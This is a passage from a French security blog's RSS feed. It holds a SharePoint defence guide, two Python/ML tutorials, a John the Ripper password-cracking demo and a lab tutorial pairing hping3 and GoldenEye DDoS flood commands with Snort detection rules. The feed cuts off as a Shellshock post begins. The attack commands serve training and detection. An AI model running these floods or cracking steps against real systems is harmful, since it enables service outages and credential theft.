<p>&nbsp;</p>
<h2><b>Se défendre : les mesures essentielles à prendre </b></h2>
<h2><b>immédiatement</b></h2>
<p class="p3"><span class="s2">Face à cette menace, </span><b>l’inaction n’est pas une option</b><span class="s2">.</span></p>
<p class="p4">Microsoft publie activement des correctifs (certains sont déjà disponibles), mais <span class="s3"><b>la vigilance et la proactivité restent vos meilleurs remparts</b></span>.</p>
<h3><b>1. </b><b>Appliquez les mises à jour sans attendre (et plus encore)</b></h3>
<p class="p3"><span class="s2">C’est la base en cybersécurité : </span><b>installez les correctifs dès leur disponibilité</b><span class="s2">.</span></p>
<p class="p4">Des patchs existent déjà pour <span class="s3"><b>SharePoint 2019</b></span> et <span class="s3"><b>Subscription Edition</b></span>.</p>
<p class="p4">Pour <span class="s3"><b>SharePoint 2016</b></span>, Microsoft y travaille encore.</p>
<p class="p3"><span class="s2">⚠️ </span><b>Mais attention : appliquer un correctif ne suffit pas !</b><b></b></p>
<p class="p4">Après la mise à jour, vous devez impérativement :</p>
<ul>
<li>
<p class="p1"><b>Changer les MachineKeys</b><b></b></p>
</li>
<li>
<p class="p1"><b>Redémarrer IIS</b></p>
</li>
</ul>
<p class="p4">Si vos clés ont déjà été volées <span class="s3"><b>avant</b></span> le patch, l’attaquant peut encore les utiliser pour <span class="s3"><b>revenir discrètement</b></span>.</p>
<p class="p4">C’est comme <span class="s3"><b>changer la serrure et les clés</b></span>, surtout si une copie a été faite.</p>
<p class="p4">Microsoft a publié un guide précis pour <span class="s3"><b>faire pivoter ces clés</b></span>.</p>
<h3><b>2. </b><b>Renforcez la détection avec AMSI et un antivirus/EDR</b></h3>
<p class="p3"><span class="s2">Activez </span><b>AMSI (Antimalware Scan Interface)</b><span class="s2"> dans SharePoint.</span></p>
<p class="p3"><span class="s2">Déployez un </span><b>antivirus performant (comme Windows Defender)</b><span class="s2"> ou une solution </span><b>EDR (Endpoint Detection and Response)</b><span class="s2"> sur vos serveurs.</span></p>
<p class="p4">AMSI agit comme un <span class="s3"><b>vigile numérique avancé</b></span>, permettant aux applications de collaborer avec l’antivirus pour <span class="s3"><b>scanner les scripts et contenus en mémoire</b></span> — y compris les web shells.</p>
<p class="p4">⚠️ Si AMSI n’est pas activable : <span class="s3"><b>déconnectez temporairement vos serveurs SharePoint d’internet</b></span> jusqu’à ce que les patchs soient en place.</p>
<h3><b>3. </b><b>Surveillez activement toute activité suspecte et les web shells</b></h3>
<p class="p4">La détection précoce est <span class="s3"><b>essentielle</b></span>.</p>
<ul>
<li>
<p class="p1">🔍 Surveillez vos serveurs SharePoint pour détecter tout comportement anormal.</p>
</li>
<li>
<p class="p1">🔍 Recherchez des fichiers ASPX suspects (ex. : <span class="s1">spinstall0.aspx</span>) dans les répertoires SharePoint — souvent utilisés comme web shells.</p>
</li>
<li>
<p class="p1">🔍 Observez les processus IIS de SharePoint : tentatives d’exécution de commandes anormales, connexions sortantes vers des IP inconnues, etc.</p>
</li>
</ul>
<p>&nbsp;</p>
<p class="p4">Si vous disposez d’un <span class="s3"><b>SIEM (Security Information and Event Management)</b></span>, configurez des <span class="s3"><b>alertes</b></span> sur ces indicateurs de compromission.</p>
<p class="p4">En cas de détection, <span class="s3"><b>isolez les serveurs concernés</b></span> et déclenchez une réponse à incident complète.</p>
<h3><b>4. </b><b>Appliquez le principe du moindre privilège et segmentez votre réseau</b></h3>
<ul>
<li>
<p class="p1">Les comptes de service et utilisateurs SharePoint ne doivent disposer <span class="s1"><b>que des droits strictement nécessaires</b></span>.</p>
</li>
<li>
<p class="p1"><span class="s1">N’accordez </span><b>jamais plus d’accès que nécessaire</b><span class="s1">.</span></p>
</li>
<li>
<p class="p1">Isolez les serveurs SharePoint des systèmes critiques via une segmentation réseau.</p>
<p class="p2"><span class="s1">Cela </span><b>limite la propagation latérale</b><span class="s1"> en cas de compromission.</span></p>
</li>
</ul>
<p>&nbsp;</p>
<h2><b>Conclusion : la vigilance constante est votre meilleur bouclier</b></h2>
<p class="p4">Ces vulnérabilités SharePoint nous rappellent brutalement que <span class="s3"><b>la cybersécurité est un combat permanent</b></span>.</p>
<p class="p4">Les attaquants ne dorment jamais. Leurs méthodes évoluent constamment.</p>
<p class="p4">Et les plateformes collaboratives — cœur de l’échange d’informations sensibles — sont <span class="s3"><b>des cibles de choix</b></span>.</p>
<p class="p3"><b>Ne paniquez pas — mais agissez vite.</b><b></b></p>
<p class="p4">En combinant :</p>
<ul>
<li>
<p class="p1">l’application rapide des correctifs</p>
</li>
<li>
<p class="p1">la surveillance active</p>
</li>
<li>
<p class="p1">la sécurisation des clés</p>
</li>
<li>
<p class="p1">et une défense en profondeur</p>
</li>
</ul>
<p class="p4">… vous pouvez transformer votre château numérique en <span class="s3"><b>véritable forteresse</b></span>.</p>
<p class="p3"><b>La collaboration est essentielle pour votre entreprise — mais pas avec des cybercriminels.</b><b></b></p>
<p class="p3"><b>Restez vigilant. Restez protégé.</b></p>
<p>
</div></div></div></div></div></div><script id="script-row-unique-2" data-row="script-row-unique-2" type="text/javascript" class="vc_controls">UNCODE.initRow(document.getElementById("row-unique-2"));</script></div></div></div>
</div><p>L’article <a href="https://www.varden-security.eu/2025/07/23/sharepoint-under-fire-when-collaboration-becomes-a-gateway-to-cyberattacks/">SharePoint Under Fire: When Collaboration Becomes a Gateway to Cyberattacks!</a> est apparu en premier sur <a href="https://www.varden-security.eu">Varden Security</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.varden-security.eu/2025/07/23/sharepoint-under-fire-when-collaboration-becomes-a-gateway-to-cyberattacks/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Introduction au Machine Learning avec Python : Votre Premier Modèle IA de A à Z</title>
		<link>https://www.varden-security.eu/2025/07/03/introduction-au-machine-learning-avec-python-votre-premier-modele-ia-de-a-a-z/</link>
		
		<dc:creator><![CDATA[Axel Legay]]></dc:creator>
		<pubDate>Wed, 02 Jul 2025 22:42:37 +0000</pubDate>
				<category><![CDATA[Trainings]]></category>
		<guid isPermaLink="false">https://www.varden-security.eu/?p=156288</guid>

					<description><![CDATA[<p>L&#8217;intelligence artificielle, souvent associée à des concepts abstraits et complexes, devient accessible grâce à Python. Aujourd’hui, vous allez découvrir comment [&#8230;]</p>
<p>L’article <a href="https://www.varden-security.eu/2025/07/03/introduction-au-machine-learning-avec-python-votre-premier-modele-ia-de-a-a-z/">Introduction au Machine Learning avec Python : Votre Premier Modèle IA de A à Z</a> est apparu en premier sur <a href="https://www.varden-security.eu">Varden Security</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>L&rsquo;intelligence artificielle, souvent associée à des concepts abstraits et complexes, devient accessible grâce à Python. Aujourd’hui, vous allez découvrir comment créer un modèle de machine learning qui apprend à prédire si un passager du Titanic a survécu ou non. Ce projet concret vous donnera une vraie compréhension de ce qu’est l’IA appliquée.</p>
<h2>Étape 1 : Comprendre les données et le rôle de <code>df</code></h2>
<p>Dans ce tutoriel, nous utilisons un jeu de données très célèbre : celui du Titanic. Chaque ligne représente un passager, avec des colonnes comme son âge, son sexe, sa classe dans le bateau, le prix payé pour son billet, et surtout, s’il a survécu (<code>Survived = 1</code>) ou non (<code>Survived = 0</code>).</p>
<p>Quand on lit ce fichier CSV avec <code>pandas</code>, on stocke les données dans une structure appelée <strong>DataFrame</strong>, abrégée en <code>df</code>. Un DataFrame est un tableau à deux dimensions : les colonnes sont les variables (âge, sexe…), et chaque ligne est un exemple (un passager). Voici comment on charge ce fichier :</p>
<pre><code>import pandas as pd

df = pd.read_csv('https://raw.githubusercontent.com/datasciencedojo/datasets/master/titanic.csv')
print(df.head())</code></pre>
<h2>Étape 2 : Nettoyage des colonnes – pourquoi et comment</h2>
<p>Le jeu de données brut contient beaucoup de colonnes inutiles ou incomplètes. Par exemple, les colonnes <code>Name</code>, <code>Ticket</code>, ou <code>Cabin</code> sont peu pertinentes pour notre tâche. De plus, certaines lignes n’ont pas de valeur dans la colonne <code>Age</code>.</p>
<p>Nous allons donc :</p>
<ul>
<li>Sélectionner les colonnes pertinentes : <code>Pclass</code> (classe sociale), <code>Sex</code>, <code>Age</code>, <code>Fare</code>, et la cible <code>Survived</code>.</li>
<li>Remplacer les valeurs manquantes dans la colonne <code>Age</code> par la médiane.</li>
<li>Convertir les valeurs textuelles (comme « male » et « female ») en nombres.</li>
</ul>
<pre><code>df = df[['Pclass', 'Sex', 'Age', 'Fare', 'Survived']]
df['Age'].fillna(df['Age'].median(), inplace=True)
df['Sex'] = df['Sex'].map({'male': 0, 'female': 1})</code></pre>
<h2>Étape 3 : Séparation entre variables explicatives et cible</h2>
<p>Le machine learning fonctionne ainsi : on donne au modèle des <em>entrées</em> (par exemple <code>Age</code>, <code>Sex</code>, <code>Fare</code>) et on lui demande d’apprendre à prédire une <em>sortie</em>(<code>Survived</code>). On sépare donc notre tableau en deux :</p>
<pre><code>X = df[['Pclass', 'Sex', 'Age', 'Fare']]
y = df['Survived']</code></pre>
<p>Ensuite, pour bien évaluer notre modèle, on le teste sur des données qu’il n’a jamais vues :</p>
<pre><code>from sklearn.model_selection import train_test_split

X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)</code></pre>
<h2>Étape 4 : Entraînement du modèle</h2>
<p>On utilise ici un <strong>arbre de décision</strong>, un algorithme simple mais très efficace pour des jeux de données de ce type :</p>
<pre><code>from sklearn.tree import DecisionTreeClassifier

model = DecisionTreeClassifier()
model.fit(X_train, y_train)</code></pre>
<h2>Étape 5 : Évaluation de la précision</h2>
<p>On peut maintenant mesurer la qualité de notre modèle :</p>
<pre><code>from sklearn.metrics import accuracy_score

y_pred = model.predict(X_test)
print("Précision :", accuracy_score(y_test, y_pred))</code></pre>
<h2>Étape 6 : Utilisation du modèle sur un cas réel</h2>
<p>Imaginons que vous ayez un nouveau passager et que vous vouliez prédire s’il aurait survécu. Voici un exemple :</p>
<pre><code>import numpy as np

# Exemple : femme de 29 ans, en 2e classe, billet à 25 €
nouveau_passager = np.array([[2, 1, 29, 25]])
prediction = model.predict(nouveau_passager)
print("Survivante" if prediction[0] == 1 else "Non survivante")</code></pre>
<h2>Conclusion : vous venez de construire une intelligence artificielle</h2>
<p>Vous avez vu comment charger des données, les nettoyer, entraîner un modèle, le tester, puis l’utiliser. Ce n’est pas de la théorie : c’est le cœur même du machine learning. Python rend cela accessible à tous, même sans être mathématicien ou ingénieur.</p>
<p>Le monde de l’IA ne vous est plus fermé. Il vous appartient maintenant de continuer à explorer, tester, modifier les paramètres, changer d’algorithme, et surtout : pratiquer.</p>
<p>L’article <a href="https://www.varden-security.eu/2025/07/03/introduction-au-machine-learning-avec-python-votre-premier-modele-ia-de-a-a-z/">Introduction au Machine Learning avec Python : Votre Premier Modèle IA de A à Z</a> est apparu en premier sur <a href="https://www.varden-security.eu">Varden Security</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Créer une API Météo Intelligente avec Python, IA et FastAPI</title>
		<link>https://www.varden-security.eu/2025/07/03/creer-une-api-meteo-intelligente-avec-python-ia-et-fastapi/</link>
					<comments>https://www.varden-security.eu/2025/07/03/creer-une-api-meteo-intelligente-avec-python-ia-et-fastapi/#respond</comments>
		
		<dc:creator><![CDATA[Axel Legay]]></dc:creator>
		<pubDate>Wed, 02 Jul 2025 22:41:42 +0000</pubDate>
				<category><![CDATA[Trainings]]></category>
		<guid isPermaLink="false">https://www.varden-security.eu/?p=156286</guid>

					<description><![CDATA[<p>Ce projet consiste à créer une API REST moderne qui interroge un service météo en temps réel, puis applique un [&#8230;]</p>
<p>L’article <a href="https://www.varden-security.eu/2025/07/03/creer-une-api-meteo-intelligente-avec-python-ia-et-fastapi/">Créer une API Météo Intelligente avec Python, IA et FastAPI</a> est apparu en premier sur <a href="https://www.varden-security.eu">Varden Security</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Ce projet consiste à créer une API REST moderne qui interroge un service météo en temps réel, puis applique un modèle de machine learning pour prédire la température dans les prochaines heures. Le tout est exposé via une interface web performante grâce à FastAPI.</p>
<h2>🧠 Objectif de l&rsquo;API</h2>
<ul>
<li>Collecter les données météo d&rsquo;une ville via l&rsquo;API OpenWeatherMap</li>
<li>Appliquer un modèle IA entraîné sur des données historiques</li>
<li>Exposer les résultats sous forme d’API REST</li>
</ul>
<h2>🧰 Librairies utilisées</h2>
<table>
<thead>
<tr>
<th>Outil</th>
<th>Utilisation</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>requests</code></td>
<td>Appels HTTP à l&rsquo;API météo</td>
</tr>
<tr>
<td><code>pandas</code></td>
<td>Manipulation de données</td>
</tr>
<tr>
<td><code>scikit-learn</code></td>
<td>Modélisation de la prédiction météo</td>
</tr>
<tr>
<td><code>FastAPI</code></td>
<td>Création de l’API REST</td>
</tr>
<tr>
<td><code>uvicorn</code></td>
<td>Serveur de développement performant</td>
</tr>
</tbody>
</table>
<pre><code>pip install fastapi uvicorn requests pandas scikit-learn</code></pre>
<h2>📡 Récupération des données météo</h2>
<p>Le fichier suivant interroge OpenWeatherMap avec une clé API. Le retour est simplifié pour n’extraire que les champs utiles.</p>
<pre><code>import requests

API_KEY = "VOTRE_CLE_API"

def get_weather(city):
    url = f"http://api.openweathermap.org/data/2.5/weather?q={city}&amp;appid={API_KEY}&amp;units=metric"
    response = requests.get(url)
    if response.status_code != 200:
        raise Exception(f"Erreur API météo : {response.status_code}")
    data = response.json()
    return {
        "city": city,
        "temperature": data["main"]["temp"],
        "humidity": data["main"]["humidity"],
        "wind": data["wind"]["speed"],
        "description": data["weather"][0]["description"]
    }</code></pre>
<h2>🤖 Modélisation IA avec scikit-learn</h2>
<p>Le modèle de régression linéaire apprend à prédire la température future (dans 3h) à partir des conditions actuelles. Ce modèle est volontairement simple pour illustrer le concept.</p>
<pre><code>import numpy as np
from sklearn.linear_model import LinearRegression

class WeatherPredictor:
    def __init__(self):
        self.model = LinearRegression()

    def train(self, historical_data):
        X = historical_data[["temperature", "humidity", "wind"]]
        y = historical_data["temperature_in_3h"]
        self.model.fit(X, y)

    def predict(self, current):
        features = np.array([[current["temperature"], current["humidity"], current["wind"]]])
        return self.model.predict(features)[0]</code></pre>
<h2>🚀 Création de l&rsquo;API REST avec FastAPI</h2>
<p>Le cœur du projet consiste à exposer un endpoint REST qui combine données météo en direct et prédiction. L’interface Swagger est automatiquement générée.</p>
<pre><code>from fastapi import FastAPI
from weather_fetcher import get_weather
from ml_model import WeatherPredictor
import pandas as pd

app = FastAPI(
    title="API Météo IA",
    description="Prévisions météo avec FastAPI et scikit-learn",
    version="1.0"
)

historical = pd.DataFrame([
    {"temperature": 20, "humidity": 65, "wind": 5, "temperature_in_3h": 21.5},
    {"temperature": 25, "humidity": 55, "wind": 3, "temperature_in_3h": 26.5},
    {"temperature": 30, "humidity": 45, "wind": 2, "temperature_in_3h": 32.0},
    {"temperature": 15, "humidity": 80, "wind": 6, "temperature_in_3h": 16.5}
])

model = WeatherPredictor()
model.train(historical)

@app.get("/predict/{city}")
def predict(city: str):
    try:
        current = get_weather(city)
        predicted = model.predict(current)
        return {
            "city": city,
            "current_weather": current,
            "predicted_temperature_in_3h": round(predicted, 2)
        }
    except Exception as e:
        return {"error": str(e)}</code></pre>
<h2>💻 Lancement local</h2>
<pre><code>uvicorn main:app --reload</code></pre>
<p>Accessible ensuite via l’interface interactive : <a href="http://localhost:8000/docs" target="_blank" rel="noopener">http://localhost:8000/docs</a></p>
<h2>🛠️ Améliorations possibles</h2>
<ul>
<li>Connexion à une base de données (SQLite, PostgreSQL)</li>
<li>Entraînement sur des données météo réelles</li>
<li>Sérialisation du modèle avec joblib</li>
<li>Système de cache pour éviter les appels API multiples</li>
<li>Système d’authentification JWT pour sécuriser les endpoints</li>
</ul>
<h2>📁 Structure recommandée</h2>
<pre><code>project/
├── main.py
├── weather_fetcher.py
├── ml_model.py
├── requirements.txt
└── data/</code></pre>
<h2>📌 Résumé</h2>
<table>
<thead>
<tr>
<th>Composant</th>
<th>Technologie utilisée</th>
</tr>
</thead>
<tbody>
<tr>
<td>Récupération météo</td>
<td>requests + OpenWeatherMap</td>
</tr>
<tr>
<td>Prédiction IA</td>
<td>scikit-learn</td>
</tr>
<tr>
<td>API REST</td>
<td>FastAPI</td>
</tr>
<tr>
<td>Serveur</td>
<td>uvicorn</td>
</tr>
</tbody>
</table>
<p>L’article <a href="https://www.varden-security.eu/2025/07/03/creer-une-api-meteo-intelligente-avec-python-ia-et-fastapi/">Créer une API Météo Intelligente avec Python, IA et FastAPI</a> est apparu en premier sur <a href="https://www.varden-security.eu">Varden Security</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.varden-security.eu/2025/07/03/creer-une-api-meteo-intelligente-avec-python-ia-et-fastapi/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Peut-on vraiment « craquer » un mot de passe ? Une démonstration pas à pas</title>
		<link>https://www.varden-security.eu/2025/07/03/peut-on-vraiment-craquer-un-mot-de-passe-une-demonstration-pas-a-pas/</link>
					<comments>https://www.varden-security.eu/2025/07/03/peut-on-vraiment-craquer-un-mot-de-passe-une-demonstration-pas-a-pas/#respond</comments>
		
		<dc:creator><![CDATA[Axel Legay]]></dc:creator>
		<pubDate>Wed, 02 Jul 2025 22:39:28 +0000</pubDate>
				<category><![CDATA[Trainings]]></category>
		<guid isPermaLink="false">https://www.varden-security.eu/?p=156282</guid>

					<description><![CDATA[<p>👇 Ce qu’on va faire Dans cet article, on montre concrètement comment un outil gratuit (présent dans Kali Linux) peut [&#8230;]</p>
<p>L’article <a href="https://www.varden-security.eu/2025/07/03/peut-on-vraiment-craquer-un-mot-de-passe-une-demonstration-pas-a-pas/">Peut-on vraiment « craquer » un mot de passe ? Une démonstration pas à pas</a> est apparu en premier sur <a href="https://www.varden-security.eu">Varden Security</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h3>👇 Ce qu’on va faire</h3>
<p>Dans cet article, on montre <strong>concrètement</strong> comment un outil gratuit (présent dans Kali Linux) peut retrouver un mot de passe simple en quelques secondes.<br />
Mais on va aussi voir pourquoi <strong>un mot de passe complexe bloque toute attaque</strong> — et comprendre pourquoi.</p>
<h3>🛠️ Les outils nécessaires</h3>
<p>On utilise un outil connu des experts cybersécurité :<br />
<strong>John the Ripper</strong> (inclus dans Kali Linux, utilisé pour les tests d’audit de mots de passe).</p>
<blockquote><p>John ne « pirate » pas un système en ligne. Il <strong>teste des mots de passe chiffrés en local</strong>, comme s’il avait volé un fichier de mots de passe (un hash).<br />
Cela simule ce qui se passe <strong>quand un hacker récupère une base de données de mots de passe cryptés</strong>.</p></blockquote>
<h3>✅ Étape 1 – Créer un mot de passe simple et le chiffrer</h3>
<p>On va créer un mot de passe :</p>
<pre><code>bonjour123</code></pre>
<p>Puis on le chiffre avec cette commande :</p>
<pre><code>echo -n "bonjour123" | openssl passwd -6 -stdin</code></pre>
<h4>📌 Explication :</h4>
<ul>
<li><code>echo -n</code> : affiche « bonjour123 » <strong>sans retour à la ligne</strong></li>
<li><code>|</code> : envoie cette sortie en entrée de la commande suivante</li>
<li><code>openssl passwd -6</code> : chiffre un mot de passe avec l&rsquo;algorithme SHA-512 (utilisé dans Linux)</li>
<li><code>-stdin</code> : lit depuis l’entrée standard (notre mot de passe)</li>
</ul>
<p><strong>Résultat</strong> : on obtient un <em>hash</em> comme :</p>
<pre><code>$6$abcdEFgh$JcV... (chaîne longue illisible)</code></pre>
<p>C’est ce que les bases de données stockent à la place du mot de passe.</p>
<h3>💾 Étape 2 – Enregistrer ce hash dans un fichier</h3>
<pre><code>echo '$6$abcdEFgh$JcV...' &gt; hash.txt</code></pre>
<p>Le fichier <code>hash.txt</code> contient maintenant 1 mot de passe chiffré.</p>
<h3>🧨 Étape 3 – Lancer l’attaque avec un dictionnaire</h3>
<pre><code>john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt</code></pre>
<h4>📌 Explication :</h4>
<ul>
<li><code>john</code> : lance l’outil</li>
<li><code>--wordlist=...</code> : fichier de mots de passe courants à tester (ex: <code>rockyou.txt</code>)</li>
<li><code>hash.txt</code> : contient notre hash à casser</li>
</ul>
<p><strong>Résultat</strong> :</p>
<pre><code>bonjour123</code></pre>
<p>Trouvé en <strong>quelques secondes</strong>.<br />
Pourquoi ? Car ce mot de passe est <strong>trop simple et trop courant</strong>.</p>
<h3>🔐 Étape 4 – Complexifier le mot de passe</h3>
<p>Changeons de mot de passe :</p>
<pre><code>Bonj0ur!2024-#</code></pre>
<p>Il est :</p>
<ul>
<li>Long (14 caractères)</li>
<li>Mélangé : majuscule, minuscule, chiffres, symboles</li>
<li>Non trivial : ce n’est pas une phrase courante</li>
</ul>
<pre><code>echo -n "Bonj0ur!2024-#" | openssl passwd -6 -stdin &gt; hash2.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash2.txt</code></pre>
<p><strong>Résultat :</strong> John ne trouve rien.</p>
<pre><code>0 password hashes cracked, 1 left</code></pre>
<p>Ce mot de passe <strong>n’est pas dans la liste</strong> et <strong>trop complexe pour être deviné</strong>.</p>
<h3>🚀 Et si on forçait John à tout essayer ?</h3>
<pre><code>john --incremental hash2.txt</code></pre>
<p>Même là, il faudrait <strong>des jours, mois ou années</strong> pour tester toutes les combinaisons possibles. Pourquoi ? Car le nombre de combinaisons est gigantesque avec 14 caractères et symboles.</p>
<h3>📊 Résumé comparatif</h3>
<table border="1">
<tbody>
<tr>
<th>Mot de passe</th>
<th>Trouvable ?</th>
<th>Temps estimé</th>
</tr>
<tr>
<td>bonjour123</td>
<td>✅ Oui</td>
<td>Quelques secondes</td>
</tr>
<tr>
<td>Bonj0ur!2024-#</td>
<td>❌ Non</td>
<td>Millions d’années (bruteforce local)</td>
</tr>
</tbody>
</table>
<h3>🔍 Conclusion</h3>
<p>Ce test montre que :</p>
<ul>
<li>Les outils d’attaque sont accessibles à tous</li>
<li>Les mots de passe simples sont très faciles à casser</li>
<li>Un bon mot de passe bloque même les outils puissants</li>
<li>Ce n’est pas une question de technologie, mais de rigueur</li>
</ul>
<p>&nbsp;</p>
<h3>🧭 Envie d’aller plus loin ?</h3>
<ul>
<li>Utiliser <code>--incremental</code> ou <code>--mask</code> pour tester plus vite</li>
<li>Essayer <strong>Hashcat</strong> (plus rapide avec une carte graphique)</li>
<li>Simuler la récupération d’un fichier <code>/etc/shadow</code> pour un test réaliste</li>
<li>Comprendre comment surveiller ou bloquer ces attaques (fail2ban, alerte SIEM, etc.)</li>
</ul>
<p>L’article <a href="https://www.varden-security.eu/2025/07/03/peut-on-vraiment-craquer-un-mot-de-passe-une-demonstration-pas-a-pas/">Peut-on vraiment « craquer » un mot de passe ? Une démonstration pas à pas</a> est apparu en premier sur <a href="https://www.varden-security.eu">Varden Security</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.varden-security.eu/2025/07/03/peut-on-vraiment-craquer-un-mot-de-passe-une-demonstration-pas-a-pas/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mener une Attaque DDoS avec Kali Linux et la Détecter avec Snort</title>
		<link>https://www.varden-security.eu/2025/07/03/mener-une-attaque-ddos-avec-kali-linux-et-la-detecter-avec-snort/</link>
					<comments>https://www.varden-security.eu/2025/07/03/mener-une-attaque-ddos-avec-kali-linux-et-la-detecter-avec-snort/#respond</comments>
		
		<dc:creator><![CDATA[Axel Legay]]></dc:creator>
		<pubDate>Wed, 02 Jul 2025 22:38:14 +0000</pubDate>
				<category><![CDATA[Trainings]]></category>
		<guid isPermaLink="false">https://www.varden-security.eu/?p=156270</guid>

					<description><![CDATA[<p>Avertissement : ce tutoriel est destiné à un usage éthique et pédagogique dans un environnement de test. Toute utilisation non [&#8230;]</p>
<p>L’article <a href="https://www.varden-security.eu/2025/07/03/mener-une-attaque-ddos-avec-kali-linux-et-la-detecter-avec-snort/">Mener une Attaque DDoS avec Kali Linux et la Détecter avec Snort</a> est apparu en premier sur <a href="https://www.varden-security.eu">Varden Security</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><strong>Avertissement :</strong> ce tutoriel est destiné à un usage éthique et pédagogique dans un environnement de test. Toute utilisation non autorisée est interdite.</p>
<h2>1. Objectif</h2>
<p>Simuler une attaque DDoS depuis Kali Linux et observer sa détection en temps réel par Snort. Cette approche est parfaite pour un exercice red/blue team.</p>
<h2>2. Préparation de l&rsquo;environnement</h2>
<ul>
<li><strong>Attaquant :</strong> Kali Linux</li>
<li><strong>Cible :</strong> Ubuntu Server avec Apache</li>
<li><strong>Snort IDS :</strong> sur une machine intermédiaire (interface en mode promiscuous)</li>
</ul>
<h2>3. Simulation d&rsquo;une attaque DDoS</h2>
<h3>3.1 SYN Flood avec hping3</h3>
<p>Le SYN flood sature les connexions TCP en enchaînant des paquets SYN sans finaliser le handshake.</p>
<pre><code>sudo hping3 -c 50000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.1.20</code></pre>
<h3>3.2 HTTP Flood avec GoldenEye</h3>
<p>GoldenEye provoque un déluge de requêtes HTTP (POST/GET).</p>
<pre><code>git clone https://github.com/jseidl/GoldenEye.git
cd GoldenEye
python3 goldeneye.py http://192.168.1.20 -w 100 -s 500 -m post</code></pre>
<h2>4. Installation de Snort</h2>
<p>Installe Snort sur une machine Debian/Ubuntu :</p>
<pre><code>sudo apt update
sudo apt install snort</code></pre>
<h2>5. Configuration des règles Snort</h2>
<h3>5.1 Règle pour SYN Flood</h3>
<p>Détecte 20 SYN dans la même seconde depuis une même IP.</p>
<pre><code>alert tcp any any -&gt; $HOME_NET 80 (msg:"SYN Flood Detected"; flags:S; threshold:type threshold, track by_src, count 20, seconds 1; sid:1000001; rev:1;)</code></pre>
<h3>5.2 Règle pour HTTP Flood</h3>
<p>Détecte 50 requêtes POST en 2 secondes.</p>
<pre><code>alert tcp any any -&gt; $HOME_NET 80 (msg:"HTTP Flood Detected"; content:"POST"; threshold:type threshold, track by_src, count 50, seconds 2; sid:1000002; rev:1;)</code></pre>
<h2>6. Lancer Snort</h2>
<p>Exécute Snort sur l&rsquo;interface réseau :</p>
<pre><code>sudo snort -A console -i eth1 -c /etc/snort/snort.conf -K ascii</code></pre>
<h2>7. Exemple d&rsquo;alerte</h2>
<p>Voici une alerte typique pour un SYN Flood :</p>
<pre><code>[**] [1:1000001:1] SYN Flood Detected [**]
[Classification: Attempted Denial of Service] [Priority: 2]
07/01-15:33:02.437116 192.168.1.100:1056 -&gt; 192.168.1.20:80
TCP TTL:64 TOS:0x0 ID:456 SEQ:101 ACK:0 WIN:1024</code></pre>
<h2>8. Mitigation</h2>
<p>Tu peux bloquer l&rsquo;adresse IP source avec :</p>
<pre><code>iptables -A INPUT -s 192.168.1.100 -j DROP</code></pre>
<h2>9. Analyse avec Wireshark</h2>
<p>Capture le trafic avec tcpdump :</p>
<pre><code>sudo tcpdump -i eth1 port 80 -w ddos_traffic.pcap</code></pre>
<p>Analyse ensuite le fichier dans Wireshark pour vérifier le flood et repérer les patterns répétitifs.</p>
<h2>Conclusion</h2>
<p>Ce laboratoire démontre comment allier offensive et défensive dans une démarche résiliente : simuler un DDoS, détecter, lire les alertes, et mettre en place des contre-mesures. Une base solide pour tout analyste SOC ou formateur sécurité.</p>
<p>L’article <a href="https://www.varden-security.eu/2025/07/03/mener-une-attaque-ddos-avec-kali-linux-et-la-detecter-avec-snort/">Mener une Attaque DDoS avec Kali Linux et la Détecter avec Snort</a> est apparu en premier sur <a href="https://www.varden-security.eu">Varden Security</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.varden-security.eu/2025/07/03/mener-une-attaque-ddos-avec-kali-linux-et-la-detecter-avec-snort/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Analyse de faille avec Nikto : exploitation et protection contre Shellshock via CGI</title>
		<link>https://www.varden-security.eu/2025/06/24/analyse-de-faille-avec-nikto-exploitation-et-protection-contre-shellshock-via-cgi/</link>
					<comments>https://www.varden-security.eu/2025/06/24/analyse-de-faille-avec-nikto-exploitation-et-protection-contre-shellshock-via-cgi/#respond</comments>
		
		<dc:creator><![CDATA[Axel Legay]]></dc:creator>
		<pubDate>Mon, 23 Jun 2025 22:43:56 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Trainings]]></category>
		<guid isPermaLink="false">https://www.varden-security.eu/?p=156290</guid>

					<description><![CDATA[<p>Introduction : pourquoi analyser les failles ? Dans le monde de la cybersécurité, l’analyse de faille est un processus indispensable. [&#8230;]</p>
<p>L’article <a href="https://www.varden-security.eu/2025/06/24/analyse-de-faille-avec-nikto-exploitation-et-protection-contre-shellshock-via-cgi/">Analyse de faille avec Nikto : exploitation et protection contre Shellshock via CGI</a> est apparu en premier sur <a href="https://www.varden-security.eu">Varden Security</a>.</p>
]]></description>
										<content:encoded><![CDATA[<article class="text-token-text-primary w-full" dir="auto" data-scroll-anchor="false" data-testid="conversation-turn-10">
<div class="text-base my-auto mx-auto py-5 [--thread-content-margin:--spacing(4)] @[37rem]:[--thread-content-margin:--spacing(6)] @[72rem]:[--thread-content-margin:--spacing(16)] px-(--thread-content-margin)">
<div class="[--thread-content-max-width:32rem] @[34rem]:[--thread-content-max-width:40rem] @[64rem]:[--thread-content-max-width:48rem] mx-auto flex max-w-(--thread-content-max-width) flex-1 text-base gap-4 md:gap-5 lg:gap-6 group/turn-messages focus-visible:outline-hidden" tabindex="-1">
<div class="group/conversation-turn relative flex w-full min-w-0 flex-col agent-turn">
<div class="relative flex-col gap-1 md:gap-3">
<div class="flex max-w-full flex-col grow">
